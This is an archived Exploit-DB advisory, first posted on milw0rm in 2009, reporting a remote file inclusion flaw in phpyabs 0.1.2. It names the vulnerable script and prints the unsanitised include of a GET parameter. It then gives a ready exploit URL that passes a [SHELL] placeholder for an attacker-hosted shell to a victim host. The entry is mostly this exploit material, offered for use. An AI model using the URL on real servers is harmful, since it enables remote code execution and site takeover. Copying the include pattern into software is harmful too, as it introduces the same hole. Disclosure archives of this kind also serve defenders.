exploit-db-mirror/exploits/php/webapps/8005.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

20 lines
No EOL
710 B
Text

********************************************************************************
phpyabs 0.1.2 RFI Vulnerability
********************************************************************************
FOUND BY: Arka69
BUG: Remote File Include (RFI)
CMS: phpyabs 0.1.2
SITE: http://exploita.altervista.org
********************************************************************************
VULNERABLE CODE: (phpyabs/moduli/libri/index.php)
include($_GET['Azione'].".php");
********************************************************************************
RFI:
http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL]
# milw0rm.com [2009-02-06]